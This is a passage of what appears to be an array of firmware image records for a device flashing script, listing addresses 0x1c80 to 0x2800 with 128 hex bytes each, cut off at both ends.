0x8b,0x12,0xa2,0xfa,0x60,0xa2,0x74,0xe3,0x1e,0xbc,0x47,0xef,0xea,0x68,0x95,0xc0, 0xf3,0x19,0xa0,0xbd,0xb2,0x53,0xc9,0xa3,0x5f,0x62,0xa3,0x27,0xe7,0x93,0x46,0x1d, 0xd3,0x6d,0x58,0xd8,0x7e,0x99,0xff,0xc4,0xce,0xe4,0x60,0x78,0xfc,0xdb,0x30,0x9d],[ # Record 25: Address = 0x1c80, Length = 128 0x1c80,0x80, 0x49,0x20,0x9f,0x0,0xad,0xfa,0x5,0x80,0x33,0x34,0x77,0x7e,0x9,0x32,0x1b,0x21, 0x40,0xf,0x1,0x72,0x86,0x5e,0xda,0xb7,0x26,0xac,0x82,0x8a,0xb,0xe9,0x9d,0x2, 0xc0,0xe6,0x21,0xf2,0x8a,0x2a,0x7,0xf3,0x63,0xe0,0xf5,0x74,0x91,0x29,0x7f,0xaa, 0x65,0x69,0x36,0x16,0xf4,0x14,0x24,0x2f,0xe,0xa8,0x5d,0x37,0xc3,0x5e,0x8c,0x70, 0x4a,0x96,0xef,0x37,0xa5,0xf3,0x8c,0xaa,0x49,0xca,0x66,0x57,0x37,0x36,0x50,0x8e, 0x3d,0xf9,0x25,0xda,0x7,0x9a,0x57,0xa8,0x76,0xec,0x6d,0x98,0xb5,0x9c,0x1d,0x76, 0x72,0x13,0x57,0xda,0x66,0x38,0x9d,0x63,0x48,0x3e,0xdb,0x71,0x94,0xd5,0xd4,0xc8, 0xbd,0x63,0x8c,0xd8,0x47,0xa4,0x8c,0xa5,0xc6,0xf9,0x77,0xf8,0xae,0x27,0xc0,0x8f],[ # Record 26: Address = 0x1d00, Length = 128 0x1d00,0x80, 0x5e,0x6f,0xeb,0xec,0x50,0x87,0xf9,0x5e,0x1d,0xdf,0x93,0x1d,0x2c,0xe9,0x64,0xfa, 0x88,0x59,0x28,0x35,0xff,0x83,0x71,0x6c,0x6f,0xde,0x3a,0x14,0xa2,0x12,0x42,0xf2, 0x68,0xd0,0xec,0xea,0x40,0xb7,0x2e,0x6d,0xfc,0x7b,0xf6,0xe0,0xe9,0xd7,0xb9,0xc9, 0x23,0xf,0x6e,0x94,0x1,0x6e,0x43,0xce,0x34,0xd8,0xbe,0x4f,0xbb,0xd6,0x7f,0xe3, 0x75,0x8b,0x55,0xe5,0x12,0x9f,0x8d,0x96,0x9a,0xaf,0x17,0xc2,0x97,0x2b,0x6f,0x41, 0xec,0xf1,0xca,0xf,0x66,0xe2,0xc2,0xa4,0xde,0x9,0x3f,0xa,0x93,0xf6,0xdb,0x6d, 0x89,0xd9,0xff,0x60,0x8,0x29,0x6e,0x2,0x58,0x7b,0x76,0x2f,0x1,0x87,0x95,0x95, 0x74,0x45,0x60,0xc6,0xee,0x38,0xb2,0x35,0xb1,0x6d,0xdb,0x1a,0x5f,0x4d,0x6c,0xf1],[ # Record 27: Address = 0x1d80, Length = 128 0x1d80,0x80, 0x44,0x8b,0x32,0x76,0x11,0x47,0x84,0x8e,0xc0,0x31,0x6f,0x79,0x48,0x74,0xf4,0xba, 0x61,0x5b,0xd0,0x98,0x72,0xa4,0xb1,0xf8,0xb6,0x65,0x94,0xb6,0xad,0x20,0x43,0xd4, 0xf5,0xc7,0x69,0x8f,0x33,0x2,0xf7,0xab,0x88,0x3a,0xc,0x1b,0x47,0x91,0x74,0xd3, 0xfe,0x20,0xcf,0x46,0x82,0xae,0x13,0x35,0x57,0xf8,0xa4,0xf9,0x2c,0x31,0x92,0x3, 0x38,0xbc,0xd4,0x7c,0xe3,0x59,0x84,0x37,0xfb,0xb9,0xf6,0xe,0x9a,0x81,0x9e,0xfe, 0xfc,0xd2,0x67,0x1c,0x20,0x70,0x13,0xee,0x82,0x63,0x22,0xf,0x4b,0xcf,0x72,0x79, 0x93,0x1f,0xdf,0x3a,0x3d,0x6b,0x50,0x30,0x86,0x2e,0xb7,0x92,0x6a,0x50,0x96,0x8, 0x96,0x9c,0x72,0xb6,0x56,0x2d,0x9b,0x3f,0x14,0x89,0xb2,0x4e,0x82,0x88,0xc9,0x4e],[ # Record 28: Address = 0x1e00, Length = 128 0x1e00,0x80, 0xb6,0x2f,0xa,0x83,0xde,0xd3,0x73,0x82,0x4a,0x1,0xe1,0x47,0xfe,0xf7,0x9d,0xf8, 0x4,0xdb,0x73,0x69,0x4f,0xe4,0x1e,0xc5,0x44,0xbc,0xb2,0xf1,0x69,0x41,0x5d,0xbe, 0x3d,0x63,0xb0,0xae,0xa2,0x6a,0x2b,0xbc,0x7c,0x36,0x96,0x9b,0x91,0xa0,0x67,0x1d, 0x36,0x96,0x8c,0xaf,0x3c,0x7a,0x12,0xc8,0x19,0x46,0xa2,0x40,0xbc,0xdf,0xe0,0x52, 0x81,0x98,0x49,0x99,0xf7,0x9f,0xc5,0xaa,0x6a,0xa4,0xc6,0x72,0x17,0xaa,0x8d,0x83, 0xa4,0xc0,0xb0,0x43,0xa2,0x7f,0x49,0x5e,0x10,0xda,0x8b,0x97,0x43,0xd,0x6d,0x2e, 0x8f,0x16,0xb8,0xd7,0x9,0x52,0xf9,0x5e,0x1e,0x45,0xa,0x5e,0xe7,0xdb,0xbd,0x6c, 0xf2,0xd0,0x50,0x93,0xe1,0xf3,0xe7,0x98,0x1c,0xb5,0x5c,0xeb,0x6,0xd8,0x4f,0x35],[ # Record 29: Address = 0x1e80, Length = 128 0x1e80,0x80, 0x46,0x4a,0xb2,0x85,0xa3,0x3,0xb0,0x7d,0x3,0x26,0x9,0xed,0x66,0x36,0x6d,0x54, 0x72,0x1d,0x62,0x2d,0x3d,0xae,0x9c,0x9a,0x7d,0x10,0xe8,0x94,0xc,0x14,0x8f,0xe7, 0x46,0x77,0x25,0xef,0x30,0x82,0x62,0x5,0x78,0xc7,0xf3,0xb9,0x2f,0x53,0x52,0x17, 0x3c,0x5,0x2e,0xf0,0x79,0xd9,0x37,0x6b,0x37,0x27,0xef,0x50,0x29,0x3,0x16,0xee, 0x4,0x9f,0xa5,0x20,0x49,0x9b,0x5a,0x4e,0x86,0x17,0x29,0x3c,0xae,0x62,0x1e,0xb9, 0x29,0x93,0x55,0x89,0x6f,0x38,0xd9,0xc1,0x61,0xe7,0x6c,0xf8,0xd8,0xba,0x44,0x42, 0x94,0x49,0x58,0x3c,0xfa,0x52,0x12,0x33,0xed,0x22,0xfa,0x9d,0x9d,0xc7,0x96,0xfb, 0xd4,0x3e,0xf2,0x10,0xca,0x69,0xcf,0x1a,0x3e,0xe0,0xf1,0x8b,0x19,0x2,0x74,0xf9],[ # Record 30: Address = 0x1f00, Length = 128 0x1f00,0x80, 0xf7,0xb2,0x49,0x52,0xdc,0xf4,0xc6,0xed,0x28,0x17,0x9c,0x8a,0x33,0xf7,0xfe,0xac, 0xe,0x59,0x7e,0xae,0xd3,0xc9,0x19,0xc5,0x62,0xa3,0xda,0x35,0x40,0x7b,0x84,0xe9, 0x2f,0xe8,0xbb,0xc7,0x33,0x2b,0xfc,0xa4,0xb1,0xa9,0x7c,0xd7,0x96,0x1b,0x24,0x6c, 0xda,0x18,0xf3,0xb7,0x2d,0xbd,0x4,0x29,0x37,0x8e,0x57,0x7e,0x15,0xbf,0x3b,0xcb, 0xa8,0x5,0xb1,0x34,0x5d,0xa3,0x9b,0x59,0xa,0xcf,0x50,0xd5,0xf8,0xa7,0xc4,0xdb, 0x7b,0x18,0x8e,0x90,0x54,0x6a,0xc3,0xad,0x6,0x46,0xae,0x97,0x62,0x42,0xb,0x4a, 0x80,0xaf,0xf2,0x0,0x8c,0x11,0x39,0x7f,0x5a,0x34,0x56,0x85,0xfc,0x54,0x7,0x8, 0xfd,0x4f,0x6e,0x56,0x89,0xa1,0x8b,0x7c,0xf0,0x4c,0xc4,0xd9,0xa9,0x55,0xd6,0x7a],[ # Record 31: Address = 0x1f80, Length = 128 0x1f80,0x80, 0xab,0xd9,0x1c,0xd7,0x94,0x0,0x2,0xba,0xf1,0xba,0xfb,0x5,0xf9,0x24,0xd2,0xed, 0x98,0xa6,0x16,0x38,0x52,0x8,0xd,0x6b,0x77,0xb1,0x67,0x3c,0xd4,0xee,0x1b,0xad, 0xe9,0xa1,0xd1,0x53,0xc4,0x5d,0xbc,0x44,0x9a,0xbf,0x4a,0x85,0x73,0x9a,0x81,0xb5, 0xf8,0x7b,0x14,0x57,0x63,0xf2,0xad,0x7f,0x5d,0x31,0xd6,0xb0,0xe,0x18,0x42,0x8f, 0xfc,0x34,0xe1,0x9e,0xc3,0x27,0x11,0x3f,0xac,0xdb,0xb9,0x76,0x4c,0xa7,0x6a,0x12, 0x60,0x7c,0xe5,0x2c,0xcd,0xe,0x69,0x71,0x54,0xdb,0x2e,0x5f,0xb9,0x9,0xb3,0x56, 0x37,0x1a,0x46,0x34,0x9,0x2c,0xb3,0x22,0xdc,0xa8,0x69,0x84,0x90,0xf1,0x4a,0x75, 0xd8,0x2,0x2c,0x6b,0x6d,0x10,0x41,0x50,0x50,0xbb,0xe2,0x54,0x84,0xbf,0xc0,0xf3],[ # Record 32: Address = 0x2000, Length = 128 0x2000,0x80, 0x14,0x14,0xf5,0x43,0xc8,0x1c,0xb5,0x1c,0xab,0x26,0x73,0xfe,0xe3,0xd2,0xe4,0x2d, 0x3e,0x14,0x59,0x51,0xa7,0x72,0x70,0x28,0x37,0x41,0x44,0x2,0x8b,0x37,0x45,0x27, 0x7e,0xe6,0x40,0x9d,0xa4,0xc,0xe3,0xa3,0xda,0xe,0x9,0x61,0x3a,0xff,0xcb,0xd3, 0xdc,0xa5,0x34,0xb,0x21,0x6d,0x70,0x2,0xd0,0x91,0xda,0xef,0xe2,0xa3,0xea,0x5a, 0xd1,0x6,0x96,0x90,0xb7,0x72,0x2a,0x41,0x80,0x8a,0xbd,0xf5,0xf0,0x84,0xf4,0x86, 0x84,0x4c,0x8b,0x34,0xcc,0xe9,0xb1,0x48,0x91,0xd8,0x8c,0xc7,0x27,0xf2,0x86,0xa2, 0x6c,0xa7,0x74,0x39,0xb7,0x37,0x56,0x6c,0x5,0xf1,0x69,0xa0,0xd4,0x55,0x16,0x8f, 0x75,0xcd,0xb2,0xf,0x30,0x20,0x7b,0xc4,0xd,0x42,0x35,0x8e,0xc6,0xd3,0xb6,0x76],[ # Record 33: Address = 0x2080, Length = 128 0x2080,0x80, 0x2d,0x79,0x32,0x3c,0xa6,0x3e,0x25,0x7f,0x16,0x49,0x87,0xed,0xce,0xf,0xff,0xaf, 0x56,0xae,0x7b,0x42,0xf,0x83,0x78,0xf8,0x3,0x0,0x55,0x4b,0xf2,0x6d,0x62,0x3b, 0x40,0x31,0xf2,0x4f,0xae,0x58,0x57,0x89,0x38,0x1d,0x5d,0x1e,0xe6,0x3c,0x91,0x53, 0x66,0x5e,0x83,0x60,0x86,0xee,0xd1,0x89,0x5d,0x5b,0xa2,0x2f,0x9,0x24,0x93,0x1a, 0x86,0xab,0xfd,0xcd,0x10,0xd9,0xa0,0x69,0x8b,0x35,0xc6,0xb4,0xf,0xa2,0x97,0xd1, 0x3c,0x74,0xd1,0x0,0xd9,0xb0,0x9e,0x6b,0xce,0xd2,0x7d,0xe0,0x9f,0x72,0xa4,0xfc, 0xac,0x67,0x1e,0x44,0x54,0x55,0xd5,0xb9,0x35,0x5f,0xa3,0xea,0x3f,0xc7,0x3c,0x68, 0xe4,0x37,0x56,0x18,0xcc,0x9e,0x65,0xaf,0x29,0x29,0x7f,0xfe,0x12,0x9,0xa1,0xd1],[ # Record 34: Address = 0x2100, Length = 128 0x2100,0x80, 0x15,0x46,0xba,0x67,0xe9,0x10,0xa,0x27,0xe9,0xf5,0xe4,0xee,0x90,0x80,0xc9,0x6d, 0x6c,0x1c,0x4c,0x98,0x62,0x38,0x69,0x36,0xb5,0xa,0x72,0xb0,0xed,0xa0,0x54,0xf0, 0x84,0x4,0xd9,0x64,0xb5,0x4a,0x59,0x7,0x4f,0xd0,0xd9,0xab,0x1a,0x5c,0xd4,0x74, 0xa8,0xf8,0xe0,0x3c,0x21,0x5e,0x53,0xcf,0xa6,0x7a,0xd,0x3d,0xc5,0xf0,0xd8,0x50, 0x79,0xa0,0xac,0x85,0x54,0xb6,0x88,0xd8,0x0,0x5f,0xd7,0x6a,0x56,0x60,0xdf,0x86, 0xb5,0x4e,0xe4,0x53,0xf9,0x9e,0x3b,0x2a,0x59,0xaf,0x3f,0x89,0x36,0x97,0xe,0xd, 0xc9,0x48,0x83,0x6d,0xe6,0xf0,0x9f,0x72,0xf2,0x3d,0xed,0xc5,0x10,0xdd,0xd5,0xf7, 0xb4,0x5b,0x19,0x17,0xb,0xbb,0xa6,0x73,0x9e,0x29,0x68,0x4f,0x6a,0x77,0x53,0x7b],[ # Record 35: Address = 0x2180, Length = 128 0x2180,0x80, 0x56,0xd0,0x47,0xa4,0xe9,0x81,0x2d,0xc6,0x36,0xbe,0xf3,0x84,0xe7,0x25,0x33,0x9f, 0xc5,0xcd,0xfe,0x9,0xdb,0x7f,0x5a,0x5d,0x60,0x55,0xdd,0xdb,0x66,0x89,0x2d,0xe3, 0xd7,0xd3,0x5c,0xcc,0x53,0x74,0xaf,0xa0,0x58,0x57,0xbd,0x31,0x4c,0xee,0xfe,0x51, 0x8d,0x70,0x11,0x4f,0x79,0x99,0x4b,0x38,0x2c,0xb5,0xb2,0x56,0x72,0x7b,0xf4,0xbf, 0xad,0x7d,0xd6,0xed,0x6c,0x4f,0x8a,0x1b,0x59,0x32,0xe6,0x60,0x31,0x37,0xd7,0x65, 0x31,0x0,0x7,0xdc,0xe8,0x84,0x53,0x59,0x29,0x61,0x1d,0x84,0xac,0x5,0x55,0xe3, 0x9e,0xc1,0x43,0x78,0xf7,0x7e,0xff,0xe7,0xeb,0x7c,0x74,0x14,0x37,0x1,0x39,0x87, 0xb6,0xb7,0x37,0xbf,0x22,0xee,0xd,0x4f,0xcd,0x73,0xf0,0x1f,0x7b,0x49,0x3f,0x31],[ # Record 36: Address = 0x2200, Length = 128 0x2200,0x80, 0xa,0xad,0x45,0x6c,0x12,0xea,0xc5,0x3c,0xf0,0x8,0x68,0xc,0x19,0xc1,0x7,0xd5, 0x25,0x85,0x99,0x64,0x49,0x32,0xf4,0x2e,0x46,0xc2,0x0,0x60,0x3a,0xd4,0xed,0x5a, 0x60,0xa9,0xbf,0xdd,0x4f,0x61,0x11,0x8a,0x4a,0x54,0xa3,0xf,0x6f,0x77,0x6d,0xa9, 0xe4,0xe6,0x1a,0x97,0xf0,0x3f,0x1e,0xa6,0xdc,0x71,0x1a,0xf9,0x1d,0x7,0x90,0x5c, 0x6a,0x92,0x2f,0x29,0xdc,0xb8,0xb3,0xfa,0xd2,0x11,0x4a,0xd4,0x2b,0x62,0xe5,0x55, 0xea,0xd1,0x68,0xa8,0xcf,0x76,0xa0,0xc,0xb3,0x7e,0x7,0xdd,0xbf,0x96,0x74,0x4a, 0xf3,0x92,0xe4,0xa7,0x7b,0xe5,0x7b,0x61,0xca,0x2b,0xda,0x30,0x84,0x93,0x4d,0x5e, 0x5,0xc1,0xbc,0x9d,0x7a,0xa0,0x5b,0x67,0xcc,0x88,0xee,0xf5,0xae,0x43,0x62,0x1],[ # Record 37: Address = 0x2280, Length = 128 0x2280,0x80, 0xf,0x8f,0x8a,0xc3,0xb2,0xd1,0x54,0xa3,0x71,0x8,0x27,0xc3,0x41,0x35,0xc1,0x31, 0x2f,0x9e,0xe7,0xfd,0xfa,0x49,0xa5,0xd2,0x79,0x22,0xc4,0xc,0xa8,0xcc,0x62,0x81, 0xa4,0x95,0xb9,0xcd,0x98,0xdb,0x52,0x79,0x83,0x21,0x92,0xf4,0x29,0x7,0x36,0xc5, 0x57,0xe3,0x2b,0x36,0x7e,0x70,0xf8,0x74,0x2b,0x70,0xd8,0xb2,0x5e,0x25,0xcc,0xfe, 0x34,0x2f,0x6f,0xc8,0x34,0x4c,0xce,0x90,0xe4,0x96,0xf6,0xc4,0x7b,0xe1,0x59,0x9a, 0x2c,0xe3,0x33,0x83,0x35,0xb5,0xe,0x2,0xfc,0x91,0x7c,0xef,0xb9,0x9a,0x51,0x28, 0x24,0x2f,0xec,0x84,0x8d,0x74,0xa9,0x39,0xad,0x5b,0xc0,0x2c,0x79,0x5a,0xc5,0x6a, 0xf4,0x68,0x6f,0xeb,0xb4,0xfb,0x42,0x39,0x1b,0xb5,0xaf,0x6e,0x68,0xa5,0x44,0xce],[ # Record 38: Address = 0x2300, Length = 128 0x2300,0x80, 0x7d,0x21,0x82,0x6c,0xa8,0xf5,0x74,0xd,0x4c,0x4a,0x2e,0xf7,0x1c,0xac,0xd3,0x63, 0x1c,0xcb,0x27,0x7b,0x21,0x8d,0xba,0x2,0x4a,0x6b,0xdb,0x5e,0x56,0x20,0x84,0xa4, 0x15,0x4f,0xf6,0xf0,0xdb,0x33,0xd9,0x23,0x84,0x47,0x1c,0x7,0xdf,0xb3,0x7,0x7c, 0x1,0xff,0x91,0xbc,0xfd,0xed,0x33,0x1f,0x2b,0xdc,0xc2,0x8a,0x5f,0x1a,0x8d,0xeb, 0x7c,0x43,0x1b,0x58,0x5,0x24,0xb1,0xd1,0xe9,0xc9,0xab,0x45,0xa8,0xe,0x2d,0xe6, 0xd6,0x67,0xa3,0x4f,0x54,0x42,0xd1,0xc8,0x77,0x7d,0x72,0x17,0xdd,0x23,0x16,0x1b, 0x83,0xb4,0x3f,0x56,0xe2,0xd1,0xba,0xf,0x16,0x16,0xa0,0x68,0xd0,0x2b,0x9f,0x70, 0x62,0xb9,0x3b,0x5f,0xa2,0xf,0x17,0xc8,0x75,0xe2,0x22,0xc2,0x91,0x4c,0x96,0xae],[ # Record 39: Address = 0x2380, Length = 128 0x2380,0x80, 0x4e,0x61,0xb3,0xbe,0x37,0x9b,0x6a,0xef,0xf5,0x52,0x69,0x71,0xf4,0xb6,0x45,0x53, 0x3a,0xa8,0xe3,0x59,0xe3,0xea,0xfd,0xc3,0xdf,0x6,0x8f,0x63,0x4e,0x82,0x4e,0x19, 0x9a,0x63,0xab,0x68,0x78,0x44,0x33,0xdd,0x83,0x77,0x64,0x6b,0xf3,0x10,0xdd,0xa9, 0xa4,0x5a,0xbe,0x77,0x4f,0x4a,0x9a,0x14,0xf5,0x77,0x1f,0xa5,0x90,0x7,0xfc,0x67, 0xf,0xf2,0x5f,0x5d,0x6e,0xe8,0x8e,0xdd,0x76,0x3b,0xd1,0xfb,0xad,0xae,0xd1,0x5c, 0x10,0x91,0x7c,0x8b,0xd5,0x4b,0xe4,0xcc,0x40,0xfe,0xb8,0x13,0xef,0x70,0xd0,0x17, 0x97,0x44,0xe4,0x83,0xa1,0x85,0x4b,0xb,0xba,0x46,0xf7,0x8,0x2d,0x4b,0x81,0xa7, 0x71,0xaf,0x79,0x92,0x6,0x69,0xe0,0xbb,0x8c,0xe3,0xa0,0x3d,0x22,0x21,0x66,0xe1],[ # Record 40: Address = 0x2400, Length = 128 0x2400,0x80, 0xaa,0xdd,0xf9,0x28,0x88,0x8f,0xc8,0x71,0x74,0x3e,0x7,0xae,0x36,0x95,0x85,0xae, 0x95,0xf8,0x82,0xcb,0x54,0xbd,0x33,0x7e,0xb1,0x91,0xc0,0x48,0x84,0xd8,0xb2,0x3b, 0xc6,0x89,0x2a,0xde,0xa6,0x3b,0x3b,0x53,0xfe,0xdf,0x6b,0xaa,0x20,0x7c,0x41,0xf1, 0xc1,0x4,0xd3,0x52,0xc0,0x98,0xc0,0x4a,0x68,0xaa,0x37,0x3f,0x88,0xfc,0x28,0x39, 0x71,0xf8,0x1b,0xc1,0x46,0xe0,0x9f,0x35,0xcf,0xb8,0x60,0xf0,0x5a,0x82,0x97,0x9c, 0x71,0xda,0x15,0xba,0xf,0xdd,0x6d,0xfa,0x9d,0xdb,0x25,0x0,0x75,0xca,0xfb,0x4e, 0x43,0x97,0x64,0xe1,0x12,0x96,0x8e,0xd0,0xd0,0x9e,0x45,0xca,0xc2,0x36,0xc,0x85, 0x5a,0x29,0x5,0x76,0xd1,0x1f,0xa3,0x6a,0x95,0x45,0x28,0xcb,0x8b,0xa9,0xcb,0xc9],[ # Record 41: Address = 0x2480, Length = 128 0x2480,0x80, 0x1b,0xeb,0xf4,0xf5,0xf9,0x7a,0x16,0xf0,0x61,0xfc,0x71,0x52,0xd4,0xe0,0x79,0x55, 0x93,0x18,0xd6,0xa3,0xaa,0xa1,0x50,0x79,0xa4,0xdc,0x14,0x58,0x2b,0x18,0x0,0x35, 0x15,0xae,0x2b,0x41,0x90,0x11,0x9d,0x77,0xbb,0xdf,0x39,0x39,0xe4,0xdc,0x59,0xc9, 0x26,0x6a,0xa7,0xf0,0xae,0x46,0xb4,0xec,0xa8,0xfa,0xfb,0x36,0x6e,0xcd,0x3e,0x3a, 0x1e,0xdb,0xe8,0xa,0x8b,0x7b,0x62,0x1a,0x10,0xcf,0x20,0x7b,0x2d,0x35,0xae,0xd0, 0x44,0xaf,0xae,0xfb,0x2d,0x79,0x33,0xc7,0xa4,0x89,0x2d,0x85,0xd6,0x60,0x96,0x7b, 0x56,0x1d,0x36,0x8,0xc4,0x7e,0x97,0xf8,0xed,0x11,0xbb,0x2c,0xac,0x45,0xbc,0x4, 0xf1,0xa,0x8,0x63,0xbf,0x56,0xf6,0xd3,0x9b,0x8a,0xca,0xd1,0x8,0x88,0x3e,0xe4],[ # Record 42: Address = 0x2500, Length = 128 0x2500,0x80, 0xa,0x68,0x19,0x48,0xaa,0x86,0x2d,0xa8,0x42,0x9c,0x1c,0x6b,0xb1,0x6b,0x86,0xda, 0xcd,0x61,0x55,0xca,0x97,0x30,0xf7,0xcf,0x67,0xe1,0x7a,0x56,0x74,0xd,0x5f,0x48, 0x52,0xf6,0x16,0x74,0x23,0x1f,0x24,0x91,0x68,0xa6,0xae,0x32,0xd8,0xf7,0x72,0x5b, 0x3a,0x6f,0x87,0x76,0xab,0xa8,0x87,0xe1,0xc0,0x68,0xc0,0xad,0xdd,0x22,0xa4,0xb, 0xed,0x4c,0x46,0xe2,0xfe,0x44,0x45,0x8a,0xc4,0xeb,0x57,0x8c,0xfd,0x5c,0xf8,0x93, 0xa,0xa1,0x1b,0xa4,0x5d,0x7a,0xe3,0x76,0xec,0x2,0x9a,0x89,0x67,0xa,0x5b,0xce, 0x9d,0x2b,0xb0,0xc1,0xf,0x3e,0xa6,0x44,0xcc,0xd5,0xbc,0x77,0x25,0xd9,0xe2,0x34, 0x78,0x48,0x36,0x21,0xb2,0x4e,0xe4,0x35,0xc9,0x30,0xd2,0xb,0xda,0x7c,0x1,0x49],[ # Record 43: Address = 0x2580, Length = 128 0x2580,0x80, 0x3b,0x45,0x5d,0x96,0xbe,0x77,0xe3,0x83,0xa5,0x4b,0xa6,0x32,0x77,0x48,0xbe,0x57, 0xf3,0xbb,0xba,0xf,0x48,0xc3,0xe3,0xa0,0xb1,0xab,0x74,0x5a,0xed,0x50,0x22,0x8c, 0xc,0x7f,0x38,0x97,0x10,0xc1,0xdb,0x6e,0x7f,0xdc,0xbf,0x7e,0x42,0xbb,0x4b,0x32, 0x46,0x35,0x7c,0x33,0xbc,0xcb,0x9b,0x14,0x94,0xc6,0xb9,0xc4,0x68,0x2a,0x29,0x6a, 0xf4,0x17,0xaa,0xdc,0xd0,0x5a,0x56,0x8a,0xe3,0x39,0x90,0x81,0xae,0x91,0x8e,0x71, 0xf1,0xc4,0xe9,0xbf,0xee,0x55,0xca,0x3e,0xd8,0x61,0xfd,0x6d,0xf8,0x1c,0x5b,0x79, 0xf4,0x9d,0x5f,0xe4,0x82,0xf3,0xc8,0xf4,0x82,0x39,0xca,0x4f,0xc4,0x72,0x10,0x8, 0x55,0xfd,0xf0,0xd,0x26,0x75,0xcc,0x25,0xad,0xbc,0x38,0xdc,0xf6,0x94,0xd2,0x7e],[ # Record 44: Address = 0x2600, Length = 128 0x2600,0x80, 0xa1,0xe,0x32,0xd6,0xec,0x9d,0x40,0x44,0x8e,0xfd,0x6f,0xc4,0xac,0x9c,0x45,0x2c, 0x23,0xb9,0xef,0x4b,0x57,0xd0,0xbc,0x64,0x24,0x70,0xe4,0xcb,0x2d,0x99,0xb8,0xf7, 0xa1,0x60,0x86,0xf1,0xf0,0x21,0xf0,0x4,0x2a,0x2a,0x6b,0xb4,0xab,0x46,0xb3,0x20, 0x63,0x1b,0x0,0x71,0x5e,0xd9,0x85,0x68,0xb6,0x19,0x41,0xf2,0x5,0xa8,0x13,0xba, 0xc5,0xfc,0x3e,0x89,0x4c,0xe1,0x7,0xf7,0x44,0x61,0x0,0x6c,0xc,0x96,0x79,0xb6, 0x47,0x4e,0xf3,0xc8,0x89,0xb1,0x1,0xa6,0x42,0x77,0x5c,0x4d,0xf9,0xb1,0x42,0xa8, 0x3c,0xd6,0x5e,0x67,0x98,0x71,0xff,0xe3,0xb3,0x30,0xf2,0x5d,0x48,0x52,0x37,0xe3, 0xf7,0x48,0xe9,0x18,0xd9,0xd2,0x74,0xe9,0xfb,0x35,0x2c,0x27,0x51,0x53,0x75,0x48],[ # Record 45: Address = 0x2680, Length = 128 0x2680,0x80, 0xb5,0x8a,0x50,0x89,0x4f,0xb6,0x87,0xfd,0x4e,0xe,0x92,0x40,0x56,0x0,0x98,0x23, 0x6a,0xdd,0x30,0x6e,0xfa,0xef,0x8a,0xde,0x31,0x49,0x31,0x8b,0x86,0xb9,0xf5,0xa9, 0xf0,0x6c,0x4d,0x62,0x10,0xc5,0xda,0xaa,0xd,0xf4,0xad,0x91,0x75,0xa2,0xf7,0xbb, 0x7d,0xb9,0x1a,0x46,0x7b,0x82,0xc8,0xa,0x4d,0xff,0x4,0x61,0x30,0x23,0xa6,0x20, 0xfc,0xde,0x6c,0xcd,0x5a,0xde,0x9d,0x14,0x99,0xd6,0x28,0x5,0xae,0x71,0x6f,0x6b, 0x48,0xbd,0x7d,0x72,0x77,0xb4,0x8f,0xc7,0xd6,0x98,0x73,0xf6,0xe3,0x93,0x85,0x3f, 0x72,0x8a,0xa5,0x5e,0x5,0x25,0xb7,0x79,0x6b,0xf8,0x3f,0x8c,0xc3,0x7d,0xc7,0xa5, 0x63,0xfa,0xa,0xfe,0xe8,0xc7,0x81,0x16,0x8c,0xb1,0xfa,0xc6,0xb6,0x37,0x4,0x7e],[ # Record 46: Address = 0x2700, Length = 128 0x2700,0x80, 0x42,0xe0,0x9a,0xd7,0x68,0x18,0x3e,0xde,0x0,0xea,0xa9,0xa3,0x65,0x69,0x9,0x87, 0xa4,0xc6,0xf3,0x24,0xfd,0x26,0x10,0xd,0x26,0x10,0xdb,0x22,0xba,0xab,0xce,0x55, 0xe7,0xda,0x81,0x65,0xa5,0xf0,0x17,0x28,0x7c,0xe0,0x2,0xb8,0xbd,0x7e,0xe8,0xed, 0xdf,0x50,0xe2,0xe7,0x4d,0xac,0xf5,0x8c,0x4b,0xd4,0xf8,0xc,0xc2,0xba,0xc4,0xce, 0xb2,0x8c,0xe2,0x70,0x56,0x38,0x69,0xbb,0x61,0x20,0xf9,0xfb,0xb2,0xa2,0xe,0xd7, 0x4e,0xe2,0x69,0x6c,0x74,0x89,0xc8,0x54,0xb5,0x22,0x6,0xdc,0x2b,0x74,0xfb,0xbd, 0xfa,0x94,0x2d,0xa7,0xe1,0x33,0xbd,0x3c,0xdb,0xb6,0xe7,0x89,0xd7,0xad,0xc1,0x9f, 0x9e,0x22,0x89,0xa3,0x8a,0xf1,0xac,0xc5,0xde,0x47,0x70,0x59,0x20,0xdb,0xb6,0x43],[ # Record 47: Address = 0x2780, Length = 128 0x2780,0x80, 0xf2,0x4,0xef,0xaa,0xca,0x62,0x9e,0x65,0x7a,0x5c,0xca,0xc1,0x47,0x34,0x12,0x6c, 0x93,0xc5,0x71,0x96,0xa7,0x39,0xb5,0x64,0x59,0xa,0x5f,0xf8,0xa0,0xec,0xea,0x6a, 0xeb,0xab,0xdd,0x99,0x66,0x12,0xb1,0x6c,0xf1,0x99,0x6b,0x6,0x40,0xd1,0xe5,0x6d, 0x64,0x9,0x17,0x5b,0xbb,0x12,0x52,0x45,0xa7,0x95,0x1a,0x42,0x96,0x5c,0xc3,0x31, 0x82,0xe4,0x92,0x94,0x1a,0x3,0x14,0x23,0xc4,0x9a,0x73,0x43,0xea,0x31,0x14,0x7e, 0xdf,0xb6,0x6e,0xd3,0x26,0x6e,0x59,0x5,0x63,0x71,0xe3,0x8f,0x72,0xe7,0x59,0xb5, 0x23,0x58,0xe2,0xa,0x61,0x88,0x79,0x77,0x89,0x16,0xd7,0xe3,0x50,0x3c,0xb5,0x67, 0xac,0xf5,0x4b,0xde,0x23,0x78,0xf,0x23,0xc0,0xfe,0x7a,0xf7,0x8d,0x17,0xe8,0x9d],[ # Record 48: Address = 0x2800, Length = 128 0x2800,0x80, 0x83,0x7a,0x9d,0xd0,0x29,0x6,0x37,0x52,0xc2,0xc9,0x52,0xf8,0x8,0xa8,0x79,0xaa, 0x8,0x8a,0x5a,0x9f,0x8f,0xa0,0xf5,0x54,0xae,0xd3,0x6a,0xa3,0x91,0x30,0x7e,0x41, 0x55,0x5a,0xe7,0x15,0xb4,0xfd,0xd0,0x26,0x5,0x6a,0x41,0xf7,0x10,0x61,0xdd,0x90, 0x64,0xae,0x2d,0x44,0x16,0x13,0x8e,0x7e,0x8b,0x3f,0x23,0x4a,0x1c,0xaa,0x25,0x1b, 0xe6,0xdd,0x1a,0x8e,0xbc,0x4d,0xf1,0x23,0xac,0xd8,0xc4,0x3f,0xe6,0x9b,0xe1,0x3a, 0x19,0x10,0xbe,0x47,0xe9,0xb,0x6c,0x87,0xd5,0x62,0xce,0x71,0xec,0x16,0x27,0x65, 